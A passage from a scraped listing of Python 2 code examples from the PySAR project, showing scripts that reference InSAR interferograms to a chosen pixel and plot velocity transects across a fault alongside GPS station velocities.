
        insarData=z
        GPSxx=[]
        GPSyy=[]
        GPSx=[];GPSy=[]
        GPS=[]
        XX0[0]=x0;XX1[0]=x1;YY0[0]=y0;YY1[0]=y1

   # else:

    print '****************'
    print 'flip up-down'
    print flip_updown

    if flip_updown=='yes' and gpsFile!='Nogps':
       print 'Flipping up-down'
       transect=-1*transect
       GPS_in_bound=-1*GPS_in_bound
    elif flip_updown=='yes':
       print 'Flipping up-down'
       transect=-1*transect


    if flip_profile=='yes' and gpsFile!='Nogps':
       
       GPS=np.flipud(GPS)
       GPS_in_bound=np.flipud(GPS_in_bound)
       DistGPS=np.flipud(max(D)-DistGPS)


    fig, axes = plt.subplots(nrows=2)
    axes[0].imshow(insarData)
    for i in range(ntrans):
        axes[0].plot([XX0[i], XX1[i]], [YY0[i], YY1[i]], 'r-')

    axes[0].plot(GPSx,GPSy,'b^')
    axes[0].plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes[0].plot(IDXref,IDYref,'r^')       
    axes[0].axis('image')
    axes[1].plot(D/1000.0,transect,'ko',ms=1)

    avgInSAR=np.array(nanmean(transect,axis=1))
    stdInSAR=np.array(nanstd(transect,axis=1))
  #  print avgInSAR
  #  print stdInSAR
    
      #std=np.std(transect,1)
   # axes[1].plot(D/1000.0, avgInSAR, 'r-')
    try:
      axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'b^',ms=10)
    except:
      print ''
   # pl.fill_between(x, y-error, y+error,alpha=0.6, facecolor='0.20')
   # print transect
#############################################################################

    fig2, axes2 = plt.subplots(nrows=1)
    axes2.imshow(insarData)
    #for i in range(ntrans):
    axes2.plot([XX0[0], XX1[0]], [YY0[0], YY1[0]], 'k-')
    axes2.plot([XX0[-1], XX1[-1]], [YY0[-1], YY1[-1]], 'k-')
    axes2.plot([XX0[0], XX0[-1]], [YY0[0], YY0[-1]], 'k-')
    axes2.plot([XX1[0], XX1[-1]], [YY1[0], YY1[-1]], 'k-')

    try:
       axes2.plot([Xf0,Xf1],[Yf0,Yf1], 'k-')
    except:
       FaultLine='None'
    

    axes2.plot(GPSx,GPSy,'b^')
    axes2.plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes2.plot(IDXref,IDYref,'r^')
    axes2.axis('image')

    figName = 'transect_area_'+str(Np)+'.png'
    print 'writing '+figName
    plt.savefig(figName)    

#############################################################################
    fig = plt.figure()
    fig.set_size_inches(10,4)
    ax = plt.Axes(fig, [0., 0., 1., 1.], )
    ax=fig.add_subplot(111)
    if display_InSAR in ['on','On','ON']:
       ax.plot(D/1000.0,transect*1000,'o',ms=1,mfc='Black', linewidth='0')


############################################################################
# save the profile data:     
    if save_to_mat in ['ON','on','On']:
       import scipy.io as sio
       matFile='transect'+str(Np)+'.mat'
       dataset={}
       dataset['datavec']=transect
       try:
         dataset['lat']=transect_lat
         dataset['lon']=transect_lon
       except:
         dataset['lat']='Nan'
         dataset['lon']='Nan'
       dataset['Unit']='m'
       dataset['Distance_along_profile']=D
       print '*****************************************'
       print ''
       print 'writing transect to >>> '+matFile
       sio.savemat(matFile, {'dataset': dataset})
       print ''
       print '*****************************************'
############################################################################
 #   ax.plot(D/1000.0, avgInSAR*1000, 'r-')
 
#    ax.plot(D/1000.0,transect*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)),'o',ms=1,mfc='Black', linewidth='0')
#    ax.plot(D/1000.0, avgInSAR*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)), 'r-')

#############################################################################
    if display_Standard_deviation in ['on','On','ON']:
 
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR-i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#,color='#DCDCDC')#'LightGrey')
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR+i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#'LightGrey')
#############################################################################
    if display_Average in ['on','On','ON']:
       ax.plot(D/1000.0, avgInSAR*1000, 'r-')
########### 
  # ax.fill_between(D/1000.0, (avgInSAR-stdInSAR)*1000, (avgInSAR+stdInSAR)*1000,where=(avgInSAR+stdInSAR)*1000>=(avgInSAR-stdInSAR)*1000,alpha=1, facecolor='Red')

    try:      
        ax.plot(DistGPS/1000.0, -1*GPS_in_bound, '^',ms=10,mfc='Cyan')
    except:
        print ''
    ax.set_ylabel('LOS velocity [mm/yr]',fontsize=26)
    ax.set_xlabel('Distance along profile [km]',fontsize=26)


   # print '******************'
   # print 'Dsitance of fault from the beginig of profile(km):'
   # print df0_km/1000.0


    ###################################################################
    #lower and higher bounds for diplaying the profile

    try:
       lbound
       hbound
    except:
       lbound=np.nanmin(transect)*1000
       hbound=np.nanmax(transect)*1000

    ###################################################################
    #To plot the Fault location on the profile
  #  try:
    ax.plot([df0_km/1000.0,df0_km/1000.0], [lbound,hbound], '--',color='black',linewidth='2')
  #  except:
  #     fault_loc='None'

    ###################################################################
    

    try: 
         ax.set_ylim(lbound,hbound)
    except:
         ylim='no'

    try: 
         ax.set_xlim(x_lbound,x_hbound)
    except:
         xlim='no'


##########
#Temporary To plot DEM
   # try:
#    majorLocator = MultipleLocator(5)
#    ax.yaxis.set_major_locator(majorLocator)
#    minorLocator   = MultipleLocator(1)
#    ax.yaxis.set_minor_locator(minorLocator)

#    plt.tick_params(which='major', length=15,width=2)
#    plt.tick_params(which='minor', length=6,width=2)

#    try:
#       for tick in ax.xaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#       for tick in ax.yaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#    
#       plt.tick_params(which='major', length=15,width=2)
#       plt.tick_params(which='minor', length=6,width=2)
#    except:
#       print 'couldn not fix the ticks! '


    figName = 'transect_'+str(Np)+'.png'
    print 'writing '+figName
    plt.savefig(figName)
    print ''
    print '________________________________'

Example 48

Project: PySAR
Source File: seed_data.py
View license
def main(argv):
  method = 'auto'
  maskFile = 'Mask.h5'
  try:
      opts, args = getopt.getopt(argv,"h:f:m:y:x:l:L:s:")

  except getopt.GetoptError:
      Usage() ; sys.exit(1)

  for opt,arg in opts:
      if opt in ("-h","--help"):
        Usage()
        sys.exit()
      elif opt == '-f':
        file = arg
      elif opt == '-m':
        method = arg
      elif opt == '-y':
        y = int(arg)
      elif opt == '-x':
        x = int(arg)
      elif opt == '-l':
        latr = float(arg)
      elif opt == '-L':
        lonr = float(arg)
      elif opt == '-s':
        maskFile = arg

  try:
     file
  except:
     Usage() ; sys.exit(1)

#  if os.path.isfile('Seeded_'+file):
#      print ''
#      print 'Seeded_'+file+ '  already exists.'
#      print ''
#      sys.exit(1)

################################ 
  h5file = h5py.File(file)
  k=h5file.keys()

  try:
     print 'Finding the row and column number for the lat/lon'
     y,x=find_row_column(lonr,latr,h5file)
     print 'The y and x found for lat lon : ' +str(y) + ' , ' + str(x)
     
  except:
    print 'Skipping lat/lon reference point.'
    print 'Continue with the y/x reference point.' 


  if 'interferograms' in k:
   Mset = h5file['mask'].get('mask')
   M = Mset[0:Mset.shape[0],0:Mset.shape[1]]
   try:
    x
    y
  
  #  h5file = h5py.File(file)
    numIfgrams = len(h5file['interferograms'].keys())
    if numIfgrams == 0.:
       print "There is no data in the file"
       sys.exit(1)
  
   # h5mask=h5py.File(maskFile,'r')
   # Mset=h5mask[h5mask.keys()[0]].get(h5mask.keys()[0])
   # M=Mset[0:Mset.shape[0],0:Mset.shape[1]]
    print 'Checking the reference pixel'
    if M[y][x]==0:
          print '*************************************************************************'    
          print 'ERROR:'
          print 'The slecetd refernce pixel has NaN value in one or more interferograms!'
          print 'Chhose another pixel as the reference pixel.'
          print '*************************************************************************'
          sys.exit(1)

    else:
          print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'
          h5file_Seeded = h5py.File('Seeded_'+file,'w')
          Seeding(h5file,h5file_Seeded,y,x)
          print 'Done!'
          h5file_Seeded.close()          
          h5file.close()
         # h5mask.close()
          
################################
   
   except:

     # h5mask=h5py.File(maskFile,'r')
     # Mset=h5mask[h5mask.keys()[0]].get(h5mask.keys()[0])
     # M=Mset[0:Mset.shape[0],0:Mset.shape[1]]
      if method=='manual':
         print 'manual selection of the reference point'
         
         h5file = h5py.File(file)
         igramList = h5file['interferograms'].keys()
         stack = ut.stacking(h5file)
         stack[M==0]=np.nan

         fig = plt.figure()
         ax=fig.add_subplot(111)
         ax.imshow(stack)
         
         print 'Click on a pixel that you want to choose as the refernce pixel in the time-series analysis and then close the displayed velocity.'

         SeedingDone='no' 
         def onclick(event):
            if event.button==1:
               print 'click'
               x = int(event.xdata)
               y = int(event.ydata)
               if not np.isnan(stack[y][x]):
                  
                  print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'
                  h5file_Seeded = h5py.File('Seeded_'+file)   
                  Seeding(h5file,h5file_Seeded,y,x)
                  print 'Done!'   
                  h5file_Seeded.close()
                  SeedingDone='yes'
                  plt.close() # this gic=ves an error message "segementation fault". Although it can be ignored, there should be a better way to close without error message!
               else:
                  print ''
                  print 'warning:'
                  print 'The slecetd refernce pixel has NaN value for some interferograms'
                  print 'Choose another pixel as the reference pixel'

              

         
         cid = fig.canvas.mpl_connect('button_press_event', onclick)
         plt.show()
         h5file.close()
         h5mask.close()

         if SeedingDone=='no':
            print '''
          **********************************     
          WARNING: interferograms are not referenced to the same pixel yet!
          **********************************
         '''
      else:
         
         print 'Automatic selection of the reference pixel!'

        # Mset=h5file['mask'].get('mask')
        # M=Mset[0:Mset.shape[0],0:Mset.shape[1]]
         
         ind0=M==0
         if ind0.sum()==M.shape[0]*M.shape[1]:
            print 'Error:'
            print 'There is no pixel that has valid phase value in all interferograms.' 
            print 'Check the interferograms!'
            print 'Seeding failed'
            sys.exit(1)            

         try:
           Cset=h5file['meanCoherence'].get('meanCoherence')
           C=Cset[0:Cset.shape[0],0:Cset.shape[1]]
         
           C=C*M
           print 'finding a pixel with maximum avergae coherence'
           y,x=np.unravel_index(np.argmax(C), C.shape)

         except:
           y,x=random_selection(M)
             

         print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'
         h5file_Seeded = h5py.File('Seeded_'+file,'w')
         Seeding(h5file,h5file_Seeded,y,x)
         print 'Done!'
         h5file_Seeded.close()
         h5file.close()
        # plt.imshow(C)
        # plt.plot(x,y,'^',ms=10)
        # plt.show()         
         
  elif 'timeseries' in k:
     print 'Seeding time-series'
     try:
        print 'Seeding time-series epochs to : y=' + str(y) + ' x='+str(x)
     except:
        print 'y and x coordinates of the Seed point are required!'
        sys.exit(1);
 
     h5file_Seeded = h5py.File('Seeded_'+file,'w')
     group=h5file_Seeded.create_group('timeseries')
     dateList=h5file['timeseries'].keys()
     for d in dateList:
        print d
        dset1=h5file['timeseries'].get(d)
        data=dset1[0:dset1.shape[0],0:dset1.shape[1]]
        dset = group.create_dataset(d, data=data-data[y,x], compression='gzip')
     
     for key,value in h5file['timeseries'].attrs.iteritems():
        group.attrs[key] = value
     group.attrs['ref_y']=y
     group.attrs['ref_x']=x

  elif 'velocity' in k:
     Vset=h5file['velocity'].get('velocity')
     V=Vset[0:Vset.shape[0],0:Vset.shape[1]]
     try:
     #   Vset=h5file[h5file.keys()[0]].get(h5file.keys()[0])
     #   V=Vset[0:Vset.shape[0],0:Vset.shape[1]]
        V=V-V[y,x]
        print y
        print x
        outFile= 'seeded_'+file
        h5file2 = h5py.File(outFile,'w')
        group=h5file2.create_group('velocity')
        dset = group.create_dataset('velocity', data=V, compression='gzip')
        for key, value in h5file[k[0]].attrs.iteritems():
            group.attrs[key] = value
        group.attrs['ref_y']=y
        group.attrs['ref_x']=x  
     except:
        print"Choose the reference point on the screen"
        fig = plt.figure()
        ax=fig.add_subplot(111)
        ax.imshow(V)

        print 'Click on a pixel that you want to choose as the refernce pixel:'
        SeedingDone='no'
        def onclick(event):
            if event.button==1:
               print 'click'
               x = int(event.xdata)
               y = int(event.ydata)
               Vset=h5file[h5file.keys()[0]].get(h5file.keys()[0])
               V=Vset[0:Vset.shape[0],0:Vset.shape[1]]
               print V[1][1]
               if not np.isnan(V[y][x]):

                  print 'Referencing all interferograms to the same pixel at:' + ' y= '+str(y)+' , x= '+str(x)+':'

                  h5file2 = h5py.File('seeded_'+file,'w')
                  V=V-V[y][x]
                  group=h5file2.create_group('velocity')
                  dset = group.create_dataset('velocity', data=V, compression='gzip')
                  for key, value in h5file[k[0]].attrs.iteritems():
                      group.attrs[key] = value
                  group.attrs['ref_y']=y
                  group.attrs['ref_x']=x
                  print 'Done!'
                  h5file2.close()
                  SeedingDone='yes'
                  plt.close() # this gic=ves an error message "segementation fault". Although it can be ignored, there should be a better way to close without error message!
               else:
                  print ''
                  print 'warning:'
                  print 'The slecetd refernce pixel has NaN value'
                  print 'Choose another pixel as the reference pixel'


        cid = fig.canvas.mpl_connect('button_press_event', onclick)
        plt.show()

Example 49

Project: PySAR
Source File: transect.py
View license
def main(argv):
    ntrans=1
    save_to_mat='off'
    flip_profile='no'
    which_gps = 'all'
    flip_updown = 'yes'
    incidence_file='incidence_file'
    display_InSAR='on'
    display_Average='on'
    display_Standard_deviation='on'

    try:
       opts, args = getopt.getopt(argv,"f:s:e:n:d:g:l:h:r:L:F:p:u:G:S:i:I:A:U:E:")

    except getopt.GetoptError:
       Usage() ; sys.exit(1)

    for opt,arg in opts:
      if opt == '-f':
        velocityFile = arg
      elif opt == '-s':
        pnt1 = arg.split(',')
        y0=int(pnt1[0])
        x0=int(pnt1[1])
      elif opt == '-e':
        pnt2 = arg.split(',')
        y1=int(pnt2[0])
        x1=int(pnt2[1])
      elif opt == '-n':
        ntrans = int(arg)
      elif opt == '-d':
        dp = float(arg)
      elif opt == '-g':
        gpsFile=arg
      elif opt == '-r':
        refStation=arg
      elif opt == '-i':
        incidence_file=arg
      elif opt == '-L':
        stationsList = arg.split(',')
      elif opt == '-F':
        FaultCoords=arg.split(',')
      elif opt == '-p':
        flip_profile=arg
      elif opt == '-u':
        flip_updown=arg
        print flip_updown
      elif opt == '-G':
        which_gps=arg
      elif opt == '-S':
        gps_source=arg
      elif opt == '-l':
        lbound=float(arg)
      elif opt == '-I':
        display_InSAR=arg
      elif opt == '-A':
        display_Average=arg
      elif opt == '-U':
        display_Standard_deviation=arg
      elif opt == '-E':
        save_to_mat=arg
      elif opt == '-h':
        hbound=float(arg) 
    

    try:    
       h5file=h5py.File(velocityFile,'r')
    except:
       Usage()
       sys.exit(1)
    
    k=h5file.keys()
    dset= h5file[k[0]].get(k[0])
    z=dset[0:dset.shape[0],0:dset.shape[1]]

#############################################################################
 #   try:
 #     x0;y0;x1;y1
 #   except:
 #     fig = plt.figure()
 #     ax=fig.add_subplot(111)
 #     ax.imshow(z)
      

#      xc=[]
#      yc=[]
#      print 'please click on start and end point of the desired profile'
#      def onclick(event):
#        if event.button==1:
#          print 'click'
#          xc.append(int(event.xdata))
#          yc.append(int(event.ydata))
#      cid = fig.canvas.mpl_connect('button_press_event', onclick)
#      plt.show()    
#      x0=xc[0];x1=xc[1]
#      y0=yc[0];y1=yc[1]
##############################################################################
    try:
      lat,lon,lat_step,lon_step,lat_all,lon_all = get_lat_lon(h5file)
    except:
      print 'radar coordinate'
    
    try:
      Lat0 = dms2d(FaultCoords[0]); Lon0 = dms2d(FaultCoords[1])
      Lat1 = dms2d(FaultCoords[2]); Lon1 = dms2d(FaultCoords[3])
      Length,Width=np.shape(z)
      Yf0,Xf0=find_row_column(Lon0,Lat0,lon,lat,lon_step,lat_step)
      Yf1,Xf1=find_row_column(Lon1,Lat1,lon,lat,lon_step,lat_step)

      print '*********************************************'
      print ' Fault Coordinates:'
      print '   --------------------------  '
      print '    Lat          Lon'
      print str(Lat0) + ' , ' +str(Lon0)
      print str(Lat1) + ' , ' +str(Lon1)
      print '   --------------------------  '
      print '    row          column'
      print str(Yf0) + ' , ' +str(Xf0)
      print str(Yf1) + ' , ' +str(Xf1)
      print '*********************************************'
#      mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
#      cf=float(Yf0-mf*Xf0)   # intercept of the fault line
#      df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
#      df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

#      mp=-1./mf  # slope of profile which is perpendicualr to the fault line 
#      x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
#      y1=int(mp*(x1-x0)+y0)


    except:
      print '*********************************************'
      print 'No information about the Fault coordinates!'
      print '*********************************************'

#############################################################################
    try:
      x0;y0;x1;y1
    except:
      fig = plt.figure()
      ax=fig.add_subplot(111)
      ax.imshow(z)
      try:
        ax.plot([Xf0,Xf1],[Yf0,Yf1],'k-')
      except:
        print 'Fault line is not specified'

      xc=[]
      yc=[]
      print 'please click on start and end point of the desired profile'
      def onclick(event):
        if event.button==1:
          print 'click'
          xc.append(int(event.xdata))
          yc.append(int(event.ydata))
      cid = fig.canvas.mpl_connect('button_press_event', onclick)
      plt.show()
      x0=xc[0];x1=xc[1]
      y0=yc[0];y1=yc[1]
##############################################################################
    try:
      mf=float(Yf1-Yf0)/float((Xf1-Xf0))  # slope of the fault line
      cf=float(Yf0-mf*Xf0)   # intercept of the fault line
      df0=dist_point_from_line(mf,cf,x0,y0,1,1)   #distance of the profile start point from the Fault line
      df1=dist_point_from_line(mf,cf,x1,y1,1,1)  #distance of the profile end point from the Fault line

      mp=-1./mf  # slope of profile which is perpendicualr to the fault line 
      x1=int((df0+df1)/np.sqrt(1+mp**2)+x0)    # correcting the end point of the profile to be on a line perpendicular to the Fault
      y1=int(mp*(x1-x0)+y0)
    except:
      Info_aboutFault='No'

##############################################################################
    print '******************************************************'
    print 'First profile coordinates:'
    print 'Start point:  y = '+str(y0) +',x = '+ str(x0) 
    print 'End point:   y = '+ str(y1) + '  , x = '+str(x1)   
    print '' 
    print str(y0) +','+ str(x0)
    print str(y1) +','+ str(x1)
    print '******************************************************'
    length = int(np.hypot(x1-x0, y1-y0))
    x, y = np.linspace(x0, x1, length), np.linspace(y0, y1, length)
    zi = z[y.astype(np.int), x.astype(np.int)]
    try:
      lat_transect=lat_all[y.astype(np.int), x.astype(np.int)]
      lon_transect=lon_all[y.astype(np.int), x.astype(np.int)] 
    except:
      lat_transect='Nan'
      lon_transect='Nan'
  #  print '$$$$$$$$$$$$$$$'
  #  print lat_transect
  #  print lat_all.shape
  #  print '$$$$$$$$$$$$$$$'

   # zi=get_transect(z,x0,y0,x1,y1)
 
    try:
       dx=float(h5file[k[0]].attrs['X_STEP'])*6375000.0*np.pi/180.0
       dy=float(h5file[k[0]].attrs['Y_STEP'])*6375000.0*np.pi/180.0
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'geo coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'
     #  df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       dx=float(h5file[k[0]].attrs['RANGE_PIXEL_SIZE'])
       dy=float(h5file[k[0]].attrs['AZIMUTH_PIXEL_SIZE'])
       DX=(x-x0)*dx
       DY=(y-y0)*dy
       D=np.hypot(DX, DY)
       print 'radar coordinate:'
       print 'profile length = ' +str(D[-1]/1000.0) + ' km'       
    #   df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)

    try:
       df0_km=dist_point_from_line(mf,cf,x0,y0,dx,dy)
    except:
       print 'Fault line is not specified'


    transect=np.zeros([len(D),ntrans])    
    transect[:,0]=zi
    XX0=[];XX1=[]
    YY0=[];YY1=[]
    XX0.append(x0);XX1.append(x1)
    YY0.append(y0);YY1.append(y1)

    if ntrans >1:
      
       m=float(y1-y0)/float((x1-x0))
       c=float(y0-m*x0)       
       m1=-1.0/m
       try:
         dp
       except:
         dp=1.0
       if lat_transect=='Nan':
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0  
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)         
           transect[:,i]=zi
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       else:
         transect_lat=np.zeros([len(D),ntrans])
         transect_lat[:,0]=lat_transect
         transect_lon=np.zeros([len(D),ntrans])
         transect_lon[:,0]=lon_transect
 
         for i in range(1,ntrans):
         
           X0=i*dp/np.sqrt(1+m1**2)+x0
           Y0=m1*(X0-x0)+y0
           X1=i*dp/np.sqrt(1+m1**2)+x1
           Y1=m1*(X1-x1)+y1
           zi=get_transect(z,X0,Y0,X1,Y1)
           lat_transect=get_transect(lat_all,X0,Y0,X1,Y1)
           lon_transect=get_transect(lon_all,X0,Y0,X1,Y1)       
           transect[:,i]=zi
           transect_lat[:,i]=lat_transect
           transect_lon[:,i]=lon_transect
           XX0.append(X0);XX1.append(X1);
           YY0.append(Y0);YY1.append(Y1);
       
   # print np.shape(XX0)
   # print np.shape(XX1)
   # print np.shape(YY0) 
   # print np.shape(YY1)


#############################################
    try:
        m_prof_edge,c_prof_edge=line(XX0[0],YY0[0],XX0[-1],YY0[-1])    
    except:
        print 'Plotting one profile'    
###############################################################################    
    if flip_profile=='yes':
       transect=np.flipud(transect)
       try:
         df0_km=np.max(D)-df0_km
       except:
         print ''
    

    print '******************************************************'
    try:
       gpsFile
    except:
       gpsFile='Nogps'
    print 'GPS velocity file:'
    print gpsFile
    print '*******************************************************'
    if os.path.isfile(gpsFile):
       insarData=z
       del z
       fileName, fileExtension = os.path.splitext(gpsFile)
    #   print fileExtension
     #  if fileExtension =='.cmm4':
     #      print 'reading cmm4 velocities'
     #      Stations, gpsData = redGPSfile_cmm4(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lon,Lat,Ve,Vn,Se,Sn,Corr,Hrate,H12=gpsData[idxRef,:]
     #      Lon=Lon-360.0
          # Lat,Lon,Ve,Se,Vn,Sn,Corr,NumEpochs,timeSpan,AvgEpochTimes = gpsData[idxRef,:]
     #      Vu=0
     #  else:
     #      Stations, gpsData = redGPSfile(gpsFile)
     #      idxRef=Stations.index(refStation)
     #      Lat,Lon,Vn,Ve,Sn,Se,Corr,Vu,Su = gpsData[idxRef,:]
      
       Stations,Lat,Lon,Ve,Se,Vn,Sn=readGPSfile(gpsFile,gps_source)
       idxRef=Stations.index(refStation)
       Length,Width=np.shape(insarData)
      # lat,lon,lat_step,lon_step = get_lat_lon(h5file,Length,Width)
       lat,lon,lat_step,lon_step,lat_all,lon_all=get_lat_lon(h5file)
       IDYref,IDXref=find_row_column(Lon[idxRef],Lat[idxRef],lon,lat,lon_step,lat_step)
       if (not np.isnan(IDYref)) and (not np.isnan(IDXref)):
         print 'referencing InSAR data to the GPS station at : ' + str(IDYref) + ' , '+ str(IDXref)
         if not np.isnan(insarData[IDYref][IDXref]):
             transect = transect - insarData[IDYref][IDXref]
             insarData=insarData - insarData[IDYref][IDXref]
            
         else:
            
             print ''' 
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
      
      WARNING: nan value for InSAR data at the refernce pixel!
               reference station should be a pixel with valid value in InSAR data.
                               
               please select another GPS station as the reference station.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                       
                   '''
             sys.exit(1)
       else:
         print 'WARNING:'
         print 'Reference GPS station is out of the area covered by InSAR data'
         print 'please select another GPS station as the reference station.'
         sys.exit(1)
       
       try:
         stationsList
       except:
         stationsList = Stations

        
      # theta=23.0*np.pi/180.0
       if os.path.isfile(incidence_file):
           print 'Using exact look angle for each pixel'
           h5file_theta=h5py.File(incidence_file,'r')
           dset=h5file_theta['mask'].get('mask')
           theta=dset[0:dset.shape[0],0:dset.shape[1]]
           theta=theta*np.pi/180.0
       else:
           print 'Using average look angle'
           theta=np.ones(np.shape(insarData))*23.0*np.pi/180.0

       heading=193.0*np.pi/180.0
       
     #  unitVec=[-np.sin(theta)*np.sin(heading),-np.cos(heading)*np.sin(theta),-np.cos(theta)]
       unitVec=[np.cos(heading)*np.sin(theta),-np.sin(theta)*np.sin(heading),0]#-np.cos(theta)]
       
      #  [0.0806152480932643, 0.34918300221540616, -0.93358042649720174]
       # print unitVec 
       # unitVec=[0.3,-0.09,0.9]
      # unitVec=[-0.3,0.09,-0.9]
      # unitVec=[-0.3,0.09,0]

      # print '*******************************************'
      # print 'unit vector to project GPS to InSAR LOS:'
      # print unitVec
      # print '*******************************************'
      # gpsLOS_ref=unitVec[0]*Ve[idxRef]+unitVec[1]*Vn[idxRef]#+unitVec[2]*Vu[idxRef]       

#       print np.shape(theta)
#       print IDYref
#       print IDXref
#       print theta[IDYref,IDXref]

       gpsLOS_ref = gps_to_LOS(Ve[idxRef],Vn[idxRef],theta[IDYref,IDXref],heading)
       print '%%%%%%^^^^^^^%%%%%%%%'
       print gpsLOS_ref/1000.0
      # insarData=insarData -gpsLOS_ref/1000.0 
      # transect = transect -gpsLOS_ref/1000.0

       GPS=[]
       GPS_station=[]
       GPSx=[]
       GPSy=[]
       GPS_lat=[]
       GPS_lon=[]
       for st in stationsList:
         try :
           idx=Stations.index(st)
          
          # gpsLOS = unitVec[0]*Ve[idx]+unitVec[1]*Vn[idx]#+unitVec[2]*Vu[idx]
            
         #  gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[idx],heading)
         #  gpsLOS=gpsLOS-gpsLOS_ref

           IDY,IDX=find_row_column(Lon[idx],Lat[idx],lon,lat,lon_step,lat_step)
           print theta[IDY,IDX]
           gpsLOS = gps_to_LOS(Ve[idx],Vn[idx],theta[IDY,IDX],heading)
         #  gpsLOS = gpsLOS-gpsLOS_ref

           if which_gps =='all':
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])   
           elif not np.isnan(insarData[IDY][IDX]):
             if theta[IDY,IDX]!=0.0:
               GPS.append(gpsLOS-gpsLOS_ref)
               GPS_station.append(st)
               GPSx.append(IDX)
               GPSy.append(IDY)
               GPS_lat.append(Lat[idx])
               GPS_lon.append(Lon[idx])
         except:
           NoInSAR='yes'   
       
      # print GPS_station
      # print gpsLOS 
       DistGPS=[]
       GPS_in_bound=[]
       GPS_in_bound_st=[] 
       GPSxx=[]
       GPSyy=[]
       for i in range(len(GPS_station)):
         gx=GPSx[i]
         gy=GPSy[i]
 #        print '******************'
      #   print gx
      #   print gy
         if which_gps in ['all','insar']:
             check_result = 'True'
         else:
             check_result=check_st_in_box(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)

         if check_result=='True':
           check_result2=check_st_in_box2(gx,gy,x0,y0,x1,y1,X0,Y0,X1,Y1)
           GPS_in_bound_st.append(GPS_station[i])
           GPS_in_bound.append(GPS[i])
           GPSxx.append(GPSx[i])
           GPSyy.append(GPSy[i])   
          # gy=y0+1
          # gx=x0+1
          # gxp,gyp=get_intersect(m,c,gx,gy)
          # Dx=dx*(gx-gxp);Dy=dy*(gy-gyp)
          # print gxp
          # print gyp
           dg = dist_point_from_line(m,c,gx,gy,1,1) # distance of GPS station from the first profile line
          # DistGPS.append(np.hypot(Dx,Dy))
          # X0=dg/np.sqrt(1+m1**2)+x0
          # Y0=m1*(X0-x0)+y0
          # DistGPS.append(np.hypot(dx*(gx-X0), dy*(gy-Y0)))
          
           DistGPS.append(dist_point_from_line(m_prof_edge,c_prof_edge,GPSx[i],GPSy[i],dx,dy))
           

       print '****************************************************'
       print 'GPS stations in the profile area:' 
       print GPS_in_bound_st
       print '****************************************************'
       GPS_in_bound = np.array(GPS_in_bound)
       DistGPS = np.array(DistGPS)
   #    axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'bo')

    if gpsFile=='Nogps':

        insarData=z
        GPSxx=[]
        GPSyy=[]
        GPSx=[];GPSy=[]
        GPS=[]
        XX0[0]=x0;XX1[0]=x1;YY0[0]=y0;YY1[0]=y1

   # else:

    print '****************'
    print 'flip up-down'
    print flip_updown

    if flip_updown=='yes' and gpsFile!='Nogps':
       print 'Flipping up-down'
       transect=-1*transect
       GPS_in_bound=-1*GPS_in_bound
    elif flip_updown=='yes':
       print 'Flipping up-down'
       transect=-1*transect


    if flip_profile=='yes' and gpsFile!='Nogps':
       
       GPS=np.flipud(GPS)
       GPS_in_bound=np.flipud(GPS_in_bound)
       DistGPS=np.flipud(max(D)-DistGPS)


    fig, axes = plt.subplots(nrows=2)
    axes[0].imshow(insarData)
    for i in range(ntrans):
        axes[0].plot([XX0[i], XX1[i]], [YY0[i], YY1[i]], 'r-')

    axes[0].plot(GPSx,GPSy,'b^')
    axes[0].plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes[0].plot(IDXref,IDYref,'r^')       
    axes[0].axis('image')
    axes[1].plot(D/1000.0,transect,'ko',ms=1)

    avgInSAR=np.array(nanmean(transect,axis=1))
    stdInSAR=np.array(nanstd(transect,axis=1))
  #  print avgInSAR
  #  print stdInSAR
    
      #std=np.std(transect,1)
   # axes[1].plot(D/1000.0, avgInSAR, 'r-')
    try:
      axes[1].plot(DistGPS/1000.0, -1*GPS_in_bound/1000, 'b^',ms=10)
    except:
      print ''
